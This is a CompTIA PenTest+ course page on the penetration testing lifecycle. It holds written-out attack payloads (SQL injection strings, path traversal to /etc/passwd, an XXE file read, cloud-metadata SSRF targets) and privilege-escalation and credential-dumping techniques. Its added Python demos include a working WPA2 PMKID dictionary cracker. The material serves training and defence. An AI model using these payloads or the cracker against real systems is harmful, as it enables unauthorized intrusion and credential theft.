Master every domain of the CompTIA PenTest+ exam. This course covers the complete penetration testing lifecycle: planning and scoping engagements, passive and active reconnaissance, vulnerability scanning, executing attacks against networks, web applications, wireless, and Active Directory, post-exploitation techniques, professional reporting, and the tools every pentester uses — with real commands, YAML examples, and exam-aligned scenarios throughout.
Advanced · 7 modules · ~35 hours · 60 practice questions
The Rules of Engagement (ROE) defines what you can test and how. The authorization letter (get-out-of-jail-free letter) is signed proof of permission. Both are required before any active testing begins. A missing authorization letter exposes the tester to criminal liability — even with the client's verbal approval.
CVSS Scoring — What the Exam Expects
Critical (9.0–10.0): The textbook profile is remote (AV:N), low complexity, no privileges, no user interaction, full CIA impact: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H scores 9.8, and 10.0 with Scope Changed. Changed scope can keep a vector Critical even when one of those is relaxed (PR:L with S:C scores 9.9; UI:R with S:C scores 9.6)
High (7.0–8.9): Remote but needing a low-privilege account or user interaction with unchanged scope (8.8), or local with full impact (a local low-privilege privesc is 7.8); significant impact
Medium (4.0–6.9): Harder to reach or exploit (local or adjacent access, high complexity, user interaction) or only partial impact
Low (0.1–3.9): Minimal exploitability or negligible impact; a vector with no C, I or A impact scores 0.0 (None)
CVSS v3.1 base metrics: Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, Confidentiality, Integrity, Availability. The band is read off the computed score, not from a checklist of metric values.
Course Modules
01
Planning, Scoping & Engagement Setup
3 lessons · ~3h
Engagement Types and Legal Foundations
Key Concepts
Black Box: No prior information provided — simulates an external attacker. The tester must discover all targets from scratch through reconnaissance. Most time-consuming but most realistic external threat simulation
White Box (Crystal Box): Full information provided including network diagrams, source code, credentials, and architecture documentation. Most efficient for thorough testing but least realistic as an adversary simulation
Gray Box: Partial information — often low-privilege credentials and a basic network map. Balances realism with efficiency. Most common in real-world assessments
External vs. Internal: External tests target internet-facing systems from outside the network perimeter. Internal tests simulate an insider threat or post-breach attacker from within the network
Social Engineering Assessments: Tests employee susceptibility to phishing, vishing (phone), smishing (SMS), and in-person pretexting. Governed by strict scope rules to avoid harming employees
The PenTest+ exam frequently tests knowledge of these engagement types and when to use each. Gray box is most common in practice because it provides a good balance of realism and coverage efficiency.
Scoping Documents and Legal Agreements
Key Concepts
Statement of Work (SOW): Defines deliverables, timelines, milestones, and payment terms. The contractual backbone of the engagement
Rules of Engagement (ROE): Operational document defining: IP ranges in scope, systems to avoid, allowed attack techniques, testing windows, escalation procedures, and emergency contacts
Non-Disclosure Agreement (NDA): Protects the client's confidential information. Prevents the tester from disclosing findings to third parties
Authorization Letter / Get-Out-of-Jail-Free Letter: Written permission signed by an authorized representative. Proves the testing is legally authorized. Must be available during the engagement
Master Service Agreement (MSA): Umbrella agreement covering all future engagements with a client. Individual engagements are governed by Statements of Work under the MSA
Third-Party Authorization: Any cloud provider, ISP, or co-location facility must separately authorize testing of shared infrastructure. AWS, Azure, and GCP have formal penetration testing policies
Know which document is signed before testing starts. The ROE is operational; the authorization letter provides legal protection; the NDA ensures confidentiality. All three must be in place before any active testing.
Threat Modeling and Compliance Drivers
Key Concepts
STRIDE Threat Model: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege. Used to classify threats during the planning phase
PCI DSS Requirement 11.3 (Requirement 11.4 in PCI DSS v4.0): Mandates penetration testing at least annually and after significant changes. Requires both external and internal tests, with segmentation testing where segmentation is used to reduce scope. Testers must follow a defined, industry-accepted methodology
NIST SP 800-115: Technical Guide to Information Security Testing. Defines four phases: planning, discovery, attack, reporting
Bug Bounty Programs: Crowdsourced vulnerability discovery with defined scopes and safe harbor provisions. Differ from traditional pentests in scope, payment structure, and reporting cadence
Compliance drivers determine the frequency and scope of required testing. PCI DSS is the most commonly tested compliance requirement on the PenTest+ exam.
02
Information Gathering & OSINT
3 lessons · ~5h
Passive Reconnaissance Techniques
Key Concepts
WHOIS: Public registration records revealing registrant name, email, registrar, nameservers, and registration dates. Useful for identifying contacts and associated IP ranges
DNS Enumeration: Querying DNS records (A, MX, NS, TXT, CNAME) to map the target's infrastructure. A DNS zone transfer (AXFR) can expose every record in the zone if the nameserver allows transfers to anyone; an AXFR request goes straight to the target's nameserver, so treat it as active
Google Dorking: Advanced search operators to find indexed sensitive content. Common dorks: site:target.com filetype:pdf, intitle:"index of", site:target.com ext:conf
Shodan: Search engine for internet-facing devices. Indexes port/service data, banners, and vulnerabilities. Used passively — queries go to Shodan's database, not the target
theHarvester: Aggregates email addresses, employee names, subdomains, and IP ranges from search engines, LinkedIn, Shodan, and Hunter.io
Certificate Transparency Logs: Public records of all SSL/TLS certificates issued. crt.sh reveals all subdomains that have received certificates — including staging, admin, and internal-facing hosts
LinkedIn / Social Media: Reveals employee names, job titles, technologies in use (from job postings), and organizational structure for social engineering targeting
On the exam, passive recon = no packets sent to the target. If a technique contacts the target's systems, it is active. Shodan, certificate transparency lookups, Google dorking, and theHarvester in its default search-engine mode are passive; Nmap, Nikto, banner grabbing, zone-transfer attempts, and theHarvester's DNS brute-force option are active. When in doubt, ask where the packets go.
Active Scanning and Service Enumeration
Key Concepts
Nmap SYN Scan (-sS): Half-open scan — sends SYN, receives SYN-ACK (open) or RST (closed), then resets. Stealthier than a full connect scan because the handshake never completes, so the listening application never sees a connection and does not log one; the SYN itself is still visible to firewalls and network IDS. Requires raw-socket privileges (root)
Nmap Full Connect Scan (-sT): Completes the TCP three-way handshake. Slower and generates application logs. Used when -sS is not possible (non-root users)
Service Version Detection (-sV): Probes open ports and identifies the specific service name and version. Critical for identifying outdated, vulnerable software
NSE (Nmap Scripting Engine): Extends Nmap with hundreds of Lua scripts for vulnerability detection, service enumeration, authentication testing, and exploitation. Scripts are tagged with categories such as auth, default, discovery, safe, intrusive, vuln, and exploit; --script=vuln runs every script tagged vuln, and -sC is shorthand for --script=default
Aggressive Mode (-A): Enables OS detection, version detection, default scripts, and traceroute in one flag. Not recommended for stealth-sensitive engagements
Banner Grabbing: Connecting to a service port and reading the initial response. Tools: Netcat (nc), Telnet, curl. Reveals service type and version without full scanning
SMB Enumeration (enum4linux): Retrieves shares, users, groups, password policy, and OS info from Windows systems via NetBIOS/SMB without credentials (if null sessions are permitted)
Nmap is the most tested tool on PenTest+. Know the key flags: -sS (SYN scan), -sT (connect scan), -sU (UDP), -sV (version), -O (OS), -A (aggressive), -p (ports), --script, -T (timing 0-5).
Vulnerability Scanning
Key Concepts
Nessus: Industry-leading vulnerability scanner. Credentialed scans log into systems to check installed software versions, missing patches, configuration flaws, and user account settings — far more thorough than unauthenticated scans
OpenVAS / Greenbone: Open-source alternative to Nessus. Full vulnerability management platform with web interface, policy management, and reporting
Nikto: Web server scanner testing for outdated server versions, dangerous HTTP methods, default files, and missing security headers. Not a deep application scanner
Credentialed vs. Unauthenticated Scans: Credentialed scans require login credentials and examine internal configuration. Unauthenticated scans only see what is exposed over the network — similar to what an external attacker sees
False Positives and False Negatives: False positives are reported vulnerabilities that do not actually exist. False negatives are real vulnerabilities the scanner missed. Manual verification is always required after automated scanning
Scan Timing and Throttling: Aggressive scan speeds can trigger IDS/IPS alerts or crash fragile systems. Engagement ROE should specify acceptable scan rates
The exam distinguishes between vulnerability scanners (Nessus, OpenVAS, Nikto — identify and report) and tools that actively exploit or manipulate the target (Metasploit, sqlmap, Burp Suite). Know which tools fall into each category.
03
Network Attacks & Exploitation
3 lessons · ~6h
Metasploit Framework
Key Concepts
msfconsole Workflow: search to find modules → use to select → show options to view required settings → set RHOSTS and set PAYLOAD → check to verify vulnerability → run or exploit to execute
Exploit Modules: Contain the attack code targeting a specific vulnerability in a specific software version. Ranked by reliability: Excellent, Great, Good, Normal, Average, Low, Manual
Payloads: Code that executes after successful exploitation. Singles (self-contained), Stagers (download larger payload), Stages (downloaded by stager). Common payloads: meterpreter, shell, cmd/unix/interact
Meterpreter: Advanced in-memory payload providing: file system access, process migration, privilege escalation, keystroke logging, screenshot capture, pivoting, and post-exploitation modules — all without writing to disk
Post-Exploitation Modules: Run after gaining a session: post/multi/recon/local_exploit_suggester for privilege escalation paths, post/windows/gather/hashdump for credential extraction
Sessions: sessions -l lists active sessions. sessions -i [id] interacts with a session. Background the active session with Ctrl+Z
The `check` command in Metasploit tests exploitability without executing the payload — always use it first to avoid causing unintended system crashes (especially relevant for EternalBlue/MS17-010 which can BSOD Windows 7).
Network and Protocol Attacks
Key Concepts
ARP Poisoning / MitM: Sending gratuitous ARP replies to poison victim ARP caches. The victim sends traffic to the attacker instead of the real gateway. Tools: arpspoof, bettercap. Requires LAN access
Pass-the-Hash (PtH): Using a captured NTLM hash to authenticate to Windows services without cracking the hash. Possible because NTLM authentication uses the hash directly in the challenge-response protocol
Kerberoasting: Any authenticated domain user can request a service ticket (TGS) for any account that has an SPN. The ticket is encrypted with a key derived from the service account's password (its NT hash when the RC4 etype 23 is used) and can be cracked offline with Hashcat (mode 13100). High-privilege service accounts with weak passwords are the primary targets; AES-only accounts are far slower to crack
AS-REP Roasting: Targets accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH). Anyone who can reach the KDC can send an AS-REQ for such an account and receive an AS-REP whose encrypted part is keyed by the account's password-derived key; it is cracked offline (Hashcat mode 18200) with no domain credentials at all, only a list of usernames
Password Spraying: Testing one common password (Password1!) across many accounts to avoid lockout. Contrasts with brute-force (many passwords against one account). Effective against default password policies
Credential Stuffing: Using leaked username/password pairs from data breaches against other services. Exploits password reuse
Windows Active Directory attacks (Pass-the-Hash, Kerberoasting, AS-REP Roasting) are heavily tested on PenTest+. Understand the mechanism behind each attack, not just the tool name.
Wireless and Physical Attacks
Key Concepts
WPA2 PMKID Attack: Modern technique that reads the PMKID from the RSN information element of the first EAPOL message (M1) the AP sends, so no client handshake capture is needed: the attacker associates and captures M1 itself. PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), and the PMK is derived from the PSK and SSID with PBKDF2, so it can be cracked offline against a wordlist. Tools: hcxdumptool + hcxpcapngtool + hashcat (mode 22000). Not every AP includes the PMKID in M1
Four-Way Handshake Capture: Classic WPA2 cracking method using airodump-ng + aircrack-ng. Capture the handshake during a client authentication event, then crack offline with a dictionary
Evil Twin Attack: Rogue AP with same SSID and higher signal strength. Clients roam to attacker's AP. Deploy a captive portal to capture credentials or intercept HTTP traffic
Deauthentication Attack: Injecting 802.11 deauth frames forces clients to disconnect from the legitimate AP. Combined with evil twin to force reassociation. Tool: aireplay-ng -0
KARMA Attack: The rogue AP responds to probe requests for any SSID, automatically matching whatever the client is looking for. Exploits the Preferred Network List (PNL)
Tailgating / Piggybacking: Following an authorized person through a secure door without badging in. Most common physical security bypass. Prevented by mantraps, turnstiles, and security awareness training
Badge Cloning: Using a Proxmark or similar device to read and clone RFID/HID proximity card data. Many older access control systems use 125kHz cards that have no encryption
Wireless attacks are a significant portion of Domain 3. Know the difference between passive attacks (capturing handshakes or PMKIDs from traffic you can already hear) and active attacks (deauth frames, evil twin, association requests). Whether passive capture and active injection are lawful differs by jurisdiction, and active injection affects every client on the channel, not only the target's — always check the ROE.
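The PMKID derivation above, carried through end to end as an added example (not from the course): derive the PMK from a passphrase and SSID, compute the PMKID the AP would place in M1, emit the hashcat 22000 line, and run the offline dictionary attack. The SSID, MAC addresses, passphrase and wordlist are constructed; the PMK test vector (passphrase "password", SSID "IEEE") is the one published in IEEE 802.11 Annex J.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK derivation from IEEE 802.11 Annex J: PBKDF2-HMAC-SHA1, 4096 iterations, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), as carried in the RSN IE of EAPOL M1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_22000_line(pmkid_value: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """The WPA-PBKDF2-PMKID+EAPOL (-m 22000) line hcxpcapngtool writes for a captured PMKID."""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid_value.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode("utf-8").hex())


def crack_pmkid(target: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, wordlist):
    """Offline dictionary attack. Each candidate costs one PBKDF2 (4096 SHA-1 rounds),
    which is why GPUs and SSID-specific precomputed tables matter in practice."""
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(wpa2_pmk(candidate, ssid), ap_mac, sta_mac), target):
            return candidate
    return None


# Constructed scenario: fictional SSID, locally administered MACs, weak passphrase.
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("02aabbccdd01")
STA_MAC = bytes.fromhex("02112233ee44")
CAPTURED_PMKID = pmkid(wpa2_pmk("Welcome123", SSID), AP_MAC, STA_MAC)   # what M1 would carry
WORDLIST = ["password", "letmein", "CorpGuest2023", "Welcome123", "Summer2024"]


def demo():
    return crack_pmkid(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST)


if __name__ == "__main__":
    print(hashcat_22000_line(CAPTURED_PMKID, AP_MAC, STA_MAC, SSID))
    print("recovered passphrase:", demo())
```

Note that the PMK depends on the SSID as a salt, so a wordlist cracked against one network cannot be reused as a rainbow table against another with a different name; this is why default or generic SSIDs weaken WPA2-PSK.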
04
Web Application Attacks
3 lessons · ~6h
Injection Vulnerabilities
Key Concepts
SQL Injection (SQLi): Inserting SQL syntax into application inputs to manipulate the database query. Types: in-band (classic), blind (boolean/time-based when no output is returned), out-of-band (data exfiltrated via DNS/HTTP). Tool: sqlmap automates detection and exploitation
Authentication Bypass via SQLi: Classic payload ' OR '1'='1 makes the WHERE condition always true, bypassing credential validation without knowing valid credentials
UNION-Based SQLi: Appends a UNION SELECT statement to the query to retrieve data from other tables. Requires knowing the number of columns in the original query (identify via ORDER BY or error messages)
OS Command Injection: Unsanitized user input passed to a shell function (system(), exec()). Shell metacharacters (;, |, &&, `) chain additional commands. Can lead to RCE
Server-Side Template Injection (SSTI): Template engines (Jinja2, Twig, Freemarker) evaluate expressions. If user input is rendered unsanitized, expressions like {{7*7}} execute code server-side. Can escalate to full RCE
LDAP Injection: Manipulating LDAP queries by injecting special characters (*, ), (, \) into input fields used to construct LDAP filter strings. Can bypass authentication or dump directory data
SQLi remains the most impactful class of web vulnerability. The PenTest+ exam focuses on understanding the mechanism (why it works) as much as the tool (sqlmap). Know how to identify blind vs. in-band SQLi and choose the appropriate testing technique.
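The mechanism behind the three payload styles above (boolean bypass, comment truncation, UNION) is clearest against a live query. The following added example (not course code) builds a constructed in-memory SQLite table, runs each payload through a string-concatenated login and through a parameterised one, and returns what each gives back. Passwords are stored in plaintext here only so the query logic stays visible; a real system stores hashes.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed users table; nothing here is real data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "correct-horse-battery-staple", "admin"),
        ("bob", "hunter2", "user"),
    ])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String concatenation: the inputs become part of the SQL grammar."""
    query = ("SELECT username, role FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    """Parameterised query: values travel separately from the statement, so quotes are just data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()


PAYLOADS = {
    # WHERE username='admin' AND password='' OR '1'='1'
    # AND binds tighter than OR, so every row satisfies the condition.
    "or_true_in_password": ("admin", "' OR '1'='1"),
    # WHERE username='admin'--' AND password='anything'
    # Everything after -- is a comment; the password check disappears.
    "comment_in_username": ("admin'--", "anything"),
    # WHERE username='' UNION SELECT name, sql FROM sqlite_master--' AND password='x'
    # The injected SELECT must return the same column count (two) as the original;
    # here it reads the schema from SQLite's catalogue instead of user rows.
    "union_schema": ("' UNION SELECT name, sql FROM sqlite_master--", "x"),
}


def run_payloads(login) -> dict:
    """Apply every payload to the given login function against a fresh database."""
    conn = build_db()
    return {name: login(conn, u, p) for name, (u, p) in PAYLOADS.items()}


if __name__ == "__main__":
    for name, row in run_payloads(login_vulnerable).items():
        print(f"vulnerable {name:22s} -> {row}")
    for name, row in run_payloads(login_safe).items():
        print(f"safe       {name:22s} -> {row}")
```

Note the asymmetry that trips people up in testing: `' OR '1'='1` placed in the username field alone does not bypass this query, because the trailing `AND password='x'` binds to the injected `'1'='1'`; it works in the password field, or in the username field when followed by a comment.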
Cross-Site Attacks and Client-Side Vulnerabilities
Key Concepts
Reflected XSS: Malicious script is injected into a URL parameter and reflected back in the response without storage. Requires tricking the victim into clicking a crafted link. Common in search boxes and error messages
Stored XSS: Script is persisted in the server's database and executed for every user who loads the affected page. Higher severity because it does not require social engineering to deliver
DOM-Based XSS: The vulnerability exists in client-side JavaScript that reads attacker-controlled data (URL hash, query string) and writes it to the DOM unsanitized. No server-side interaction — the server response is benign
CSRF (Cross-Site Request Forgery): Forces a victim's authenticated browser to make unauthorized state-changing requests to a trusted site. Prevented by anti-CSRF tokens (unique, unpredictable values in every form)
Clickjacking: Overlays a transparent iframe of the target site over a decoy page. Victim clicks on the decoy but the click goes to the target site. Prevented with X-Frame-Options or Content-Security-Policy: frame-ancestors
Open Redirect: Application accepts a URL as a redirect parameter without validation. Attackers craft links using the trusted domain that redirect to malicious sites. Used in phishing campaigns
XSS attack types are a common exam topic. The key distinction: Reflected = immediate response, Stored = persisted in DB, DOM = client-side only. Always check which type is present before testing bypasses.
Advanced Web Vulnerabilities
Key Concepts
Path Traversal (Directory Traversal): Using ../ sequences to access files outside the intended web root. Common payloads: ../../../../etc/passwd, ..\..\Windows\System32\cmd.exe. Some filters require URL encoding: %2e%2e%2f
Server-Side Request Forgery (SSRF): Application fetches URLs provided by the user. Attacker supplies internal URLs: AWS metadata endpoint (169.254.169.254), internal APIs, admin interfaces. Can exfiltrate cloud credentials or scan internal networks
Insecure Direct Object Reference (IDOR): Predictable resource identifiers in URLs or parameters expose other users' data. Changing ?id=1234 to ?id=1235 accesses another user's record. Prevented by authorization checks on every data access
XML External Entity (XXE): Malicious XML input references an external entity. The XML parser resolves it, reading local files or making HTTP requests. Payload: <!ENTITY xxe SYSTEM "file:///etc/passwd">
Insecure Deserialization: Application deserializes attacker-controlled data. Manipulated serialized objects can trigger arbitrary code execution. Affects Java, PHP, Python, and .NET applications using native serialization
SSRF targeting cloud metadata endpoints is one of the most impactful modern web vulnerabilities. AWS IMDSv2 mitigates it by requiring a PUT request (with an X-aws-ec2-metadata-token-ttl-seconds header) to obtain a session token that every later GET must present in the X-aws-ec2-metadata-token header; most SSRF primitives can only issue GETs without custom headers, so they never reach the credentials. Not every organization has enforced IMDSv2 on its instances. Know the 169.254.169.254 address cold.
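The path traversal entry above lists the payload variants (plain ../, Windows backslashes, URL-encoded %2e%2e%2f); the check a handler needs is to decode, normalise, and then confirm the result is still under the web root. The following is an added example, not course code, with a constructed web root: a naive join that lets ../ escape, beside a hardened resolver that also handles double encoding, backslashes, absolute paths and NUL bytes. It is a lexical check; a real handler should additionally use os.path.realpath so symlinks inside the root cannot point outside it.

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www/html"   # constructed example root


class TraversalError(ValueError):
    pass


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Undo URL encoding until stable, so %2e%2e%2f and double-encoded %252e%252e%252f both become '../'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def resolve_vulnerable(webroot: str, user_path: str) -> str:
    """Naive join as seen in vulnerable handlers: '../' walks out of the web root."""
    return posixpath.normpath(webroot + "/" + user_path)


def resolve_safe(webroot: str, user_path: str) -> str:
    """Decode, normalise, then verify the result is still inside the root."""
    decoded = fully_decode(user_path).replace("\\", "/")
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    if decoded.startswith("/"):
        raise TraversalError("absolute path not allowed")
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError("path escapes web root: " + candidate)
    return candidate


def is_safe(user_path: str, webroot: str = WEBROOT) -> bool:
    try:
        resolve_safe(webroot, user_path)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # Constructed payloads mirroring the ones listed above.
    for p in ("images/logo.png", "../../../../etc/passwd", "%2e%2e%2f%2e%2e%2fetc/passwd",
              "%252e%252e%252fetc%252fpasswd", "..\\..\\Windows\\System32\\cmd.exe"):
        print(f"{p:40s} naive={resolve_vulnerable(WEBROOT, p):28s} safe={'allowed' if is_safe(p) else 'blocked'}")
```

The `candidate != root and not startswith(root + "/")` comparison is the part people get wrong: checking `startswith(root)` alone would accept `/var/www/html2/secret` as being inside `/var/www/html`.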
SUID/SGID Binaries: Files with SUID set run as the file owner (often root). Discovery: find / -perm -4000 -type f 2>/dev/null. GTFOBins documents escape techniques for SUID binaries including vim, find, python, awk, and nmap
Sudo Misconfigurations: sudo -l lists allowed commands. Running allowed binaries with sudo that spawn shells (e.g., sudo vim then :!/bin/bash) grants root access
Cron Job Hijacking: World-writable scripts or binaries called by root-owned cron jobs. Replace or modify the script content to add a SUID binary or reverse shell
Writable /etc/passwd: If the file is world-writable, add a new root user entry with a known password hash. Rare but high impact when found
Kernel Exploits: Exploiting unpatched kernel CVEs (Dirty COW CVE-2016-5195, GameOver(lay) CVE-2023-2640). Check kernel version with uname -r and research applicable exploits
PATH Hijacking: If a SUID binary executes another program by bare name (resolved through PATH) instead of by absolute path, prepending an attacker-controlled directory to PATH and placing a malicious binary of that name there causes it to run with the elevated privileges. Inspect candidates with strings or strace for unqualified calls such as service, cat, or ps
SUID abuse is the most commonly tested Linux privilege escalation technique on PenTest+. Remember the GTFOBins resource — it catalogs escape techniques for dozens of standard binaries when run with elevated permissions.
Windows Privilege Escalation and Lateral Movement
Key Concepts
Mimikatz sekurlsa::logonpasswords: Extracts plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS memory. Requires SYSTEM or debug privilege. Mitigated by disabling WDigest caching and enabling Credential Guard
Token Impersonation: Stealing security tokens from privileged processes using tools like Incognito (Metasploit module). Allows impersonating domain admins if their tokens are in memory
Unquoted Service Paths: Windows services with unquoted paths containing spaces. Windows resolves C:\Program Files\App\service.exe by trying C:\Program.exe first. Placing a malicious binary at an earlier resolution path escalates privileges
DLL Hijacking: Applications search for DLLs in directories they can write to. Placing a malicious DLL earlier in the search order causes it to load with the application's privileges
Pass-the-Hash: Using captured NTLM hashes with PsExec, Impacket's wmiexec, or CrackMapExec to authenticate to other systems without knowing the plaintext password. Core lateral movement technique
DCSync Attack: Uses the MS-DRSR replication protocol (DRSGetNCChanges) to pose as a domain controller and ask a real DC to replicate account secrets. Requires the Replicating Directory Changes and Replicating Directory Changes All rights on the domain naming context, which Domain Admins, Enterprise Admins, and domain controller computer accounts hold by default. Extracts every domain password hash, including krbtgt
Post-exploitation and lateral movement define what separates a pentest from a vulnerability assessment. The PenTest+ exam tests understanding of the full attack chain: initial access → privilege escalation → lateral movement → persistence → data access.
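The unquoted service path resolution described above is mechanical enough to check automatically, which is what PowerUp-style scripts do. The following added example (not course code) computes, for a constructed list of services and a constructed set of directories the current user can write to, the exact file names CreateProcess would try before the real binary and which of them land in a writable directory. Service names, paths and the writable directory are made up; on a real host the inputs come from `wmic service get name,pathname,startname` (or Get-CimInstance Win32_Service) and an ACL check.

```python
import ntpath


def unquoted_path_candidates(image_path: str) -> list:
    """Executables CreateProcess will try, in order, for an unquoted ImagePath containing spaces.
    For 'C:\\Program Files\\Vendor App\\svc.exe -arg' that is C:\\Program.exe,
    'C:\\Program Files\\Vendor.exe', then the real binary (arguments are ignored)."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []                     # quoted path: the executable name is unambiguous
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if not prefix.lower().endswith(".exe"):
            prefix += ".exe"
        candidates.append(prefix)
        if tokens[i - 1].lower().endswith(".exe"):
            break                     # reached the real executable; the rest are arguments
    return candidates


def hijack_points(image_path: str, writable_dirs) -> list:
    """Candidate paths (excluding the real binary) whose directory the current user can write to."""
    writable = {ntpath.normcase(d.rstrip("\\")) for d in writable_dirs}
    cands = unquoted_path_candidates(image_path)
    return [c for c in cands[:-1] if ntpath.normcase(ntpath.dirname(c).rstrip("\\")) in writable]


def audit_services(services, writable_dirs) -> list:
    """(service, account, hijack path) for every exploitable unquoted path."""
    findings = []
    for name, image_path, account in services:
        for point in hijack_points(image_path, writable_dirs):
            findings.append((name, account, point))
    return findings


# Constructed inventory: one vulnerable third-party service, one built-in, one correctly quoted.
SERVICES = [
    ("VendorAgent", r"C:\Program Files\Vendor App\Svc Host\service.exe -k agent", "LocalSystem"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "LocalSystem"),
    ("GoodSvc", r'"C:\Program Files\Good Vendor\good.exe"', "LocalSystem"),
]
# Constructed: e.g. an installer that granted BUILTIN\Users modify rights on its folder.
WRITABLE_DIRS = [r"C:\Program Files\Vendor App"]


if __name__ == "__main__":
    for name, account, point in audit_services(SERVICES, WRITABLE_DIRS):
        print(f"{name} ({account}): drop payload at {point}")
```

Two conditions beyond the path itself decide exploitability: the service must run as a more privileged account than you, and you need a way to make it start again (a restart right on the service, or a reboot), since the substitute binary only runs at the next service start.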
06
Reporting, Communication & Ethics
2 lessons · ~4h
Professional Penetration Test Report Structure
Key Concepts
Executive Summary: Written for non-technical stakeholders. Covers: overall security posture, business risk of findings, prioritized remediation recommendations. No CVE numbers or command output
Methodology: Describes the testing approach, tools used, and standards followed (PTES, OWASP, NIST). Provides context for the technical team
CVSS Scoring: Base score uses AV, AC, PR, UI, S, C, I, A metrics. The textbook Critical is network-accessible, no-auth, no-interaction, full CIA impact (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = 9.8), but any computed score of 9.0 or above is Critical. Know the score ranges for all severity levels
Risk Ratings: Risk = Likelihood × Impact. A theoretically critical vulnerability behind multiple compensating controls may be rated lower actual risk. Report both the raw CVSS and the contextual risk
Attack Narrative: Tells the story of the engagement — initial access path, privilege escalation chain, and final impact. Demonstrates real-world business risk to stakeholders who do not read technical details
The exam frequently tests what belongs in the Executive Summary vs. Technical Findings. Rule of thumb: if it contains a command, CVE ID, or screenshot, it belongs in Technical Findings, not the Executive Summary.
Post-Engagement Activities and Ethics
Key Concepts
Cleanup: Remove all backdoors, created accounts, uploaded files, C2 agents, and configuration changes. Document every artifact created and confirm removal. Failure to clean up can result in real attackers leveraging your tools
Remediation Verification (Retesting): After the client patches, retest specific vulnerabilities to confirm fixes are effective. This is a targeted, scoped activity — not a full re-engagement
Data Handling: Securely delete all client data after report delivery per the data handling agreement. Reports containing sensitive data must be encrypted at rest and in transit
Responsible Disclosure: For zero-days found in third-party vendor software, follow coordinated disclosure: notify the vendor, allow a reasonable remediation window (typically 90 days), then disclose publicly
Non-Disclosure: Findings are confidential. Sharing client vulnerabilities with third parties (without authorization) violates the NDA and may constitute criminal computer fraud
Debrief: Walk the client's technical team through findings, reproduction steps, and remediation priorities. Provides context that a written report alone cannot convey
Ethics questions are common on PenTest+. The exam tests whether candidates understand boundaries: you cannot keep access after engagement end, you cannot retain client data beyond the agreed period, and you must disclose zero-days responsibly.
Match tools to their primary use case. The exam often presents a scenario and asks which tool is MOST appropriate. Know the difference between vulnerability scanners (Nessus, Nikto) and exploitation tools (Metasploit, sqlmap).
Burp Suite Deep Dive
Key Concepts
Proxy Module: Intercepts and modifies HTTP/HTTPS traffic between the browser and server. Requires installing Burp's CA certificate in the browser to intercept HTTPS. Core tool for web application testing
Intruder: Automated attack tool for brute-forcing parameters, credential stuffing, fuzzing inputs, and testing all values in a list. Four attack modes: Sniper, Battering Ram, Pitchfork, Cluster Bomb
Repeater: Manually resend and modify individual HTTP requests and view responses. Used to test specific injection points, verify vulnerabilities, and craft exploits
Scanner (Pro): Automated vulnerability scanner that tests for SQLi, XSS, SSRF, XXE, path traversal, and hundreds of other issues. Pro feature — not available in Community edition
SSL Pinning Bypass: When apps implement certificate pinning, Burp's CA is rejected. Bypass using Frida to hook the pinning validation function at runtime or use apktool to patch the APK
Extensions: BApp Store provides community extensions. Notable: Autorize (authorization testing), Param Miner (hidden parameters), J2EEScan, SQLipy
Burp Suite is the dominant web application testing tool in the industry. The PenTest+ exam tests conceptual understanding — knowing what each module does, not every menu option. Focus on Proxy, Intruder, Repeater, and the concept of SSL pinning.
Scripting and Code Analysis
Key Concepts
Python for Pentesting: Socket module for TCP connect scanners; requests module for HTTP testing; subprocess for running OS commands; struct for binary data manipulation. Understanding simple scripts is tested on PenTest+
Bash Scripting: Ping sweeps using loops and ICMP, parsing Nmap output, automating directory enumeration, and one-liner reverse shells. Know shell metacharacters for command injection context
Code Review for Vulnerabilities: Identifying injection sinks (SQL queries, shell commands, template rendering, deserialization), missing input validation, hardcoded credentials, insecure random number generation, and trust boundary violations
Identifying Vulnerability Type from Code: Seeing query = "SELECT * FROM users WHERE name='" + user_input + "'" → SQLi. Seeing os.system("ping " + user_input) → command injection. Seeing exec(user_input) → RCE
The Tools and Code Analysis domain (16%) includes reading short code snippets and identifying the vulnerability or attack technique. Practice recognizing SQLi, command injection, and SSRF patterns in Python, PHP, and Bash code.
